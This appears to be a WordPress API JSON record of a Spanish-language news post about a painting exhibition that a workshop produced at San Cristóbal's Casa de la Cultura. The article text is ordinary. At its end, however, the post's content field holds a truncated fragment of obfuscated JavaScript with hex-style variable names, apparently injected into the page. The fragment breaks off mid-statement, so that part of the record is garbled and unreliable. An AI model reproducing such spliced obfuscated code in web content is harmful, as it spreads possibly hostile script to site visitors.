{"id":16847,"date":"2024-07-23T02:23:50","date_gmt":"2024-07-23T02:23:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16847"},"modified":"2024-07-23T02:23:51","modified_gmt":"2024-07-23T02:23:51","slug":"montan-exposicion-pictorica-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16847","title":{"rendered":"Montan exposici\u00f3n pict\u00f3rica en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240722-WA0047-1024x576.jpg\" alt=\"\" class=\"wp-image-16848\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240722-WA0047-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240722-WA0047-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240722-WA0047-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240722-WA0047-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240722-WA0047.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>22 de julio del 2024. SCLC.- Javier Farrera, licenciado en Artes Visuales de la Unicach, dio a conocer que se inaugur\u00f3 la exposici\u00f3n Reminiscencias invisible, el cual es producto de un taller que imparti\u00f3 en La Casa de la cultura de San Crist\u00f3bal, con parte de trabajos de tesis que realiza, con el tema de reconstrucci\u00f3n de recuerdos.<\/p>\n\n\n\n<p>En entrevista, explic\u00f3 que esta exposici\u00f3n que fue montada en los pasillos de la Casa de la Cultura, concluir\u00e1 hasta el pr\u00f3ximo 29 de Julio, y estar\u00e1 abierta al p\u00fablico de 8 de la ma\u00f1ana a 8 de la noche.<\/p>\n\n\n\n<p>&#8220;Tuve como 20 alumnos, algunos se fueron yendo, otros quedando, pero que ya no habr\u00e1 un seguimiento, ya que solo fue producto de su tesis, pero ya he considerado iniciar uno m\u00e1s el 29 de Junio en el mismo espacio. Hay mucho talento, solo hay que pulirlos&#8221; concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 22 de julio del 2024. SCLC.- Javier Farrera, licenciado en Artes Visuales de la Unicach, dio a conocer que se inaugur\u00f3 la exposici\u00f3n Reminiscencias invisible, el cual es producto de un taller que imparti\u00f3 en La Casa de la cultura de San Crist\u00f3bal, con parte de trabajos de tesis que realiza, con &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16848,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16847","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16847","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16847"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16847\/revisions"}],"predecessor-version":[{"id":16849,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16847\/revisions\/16849"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16848"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16847"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16847"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16847"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}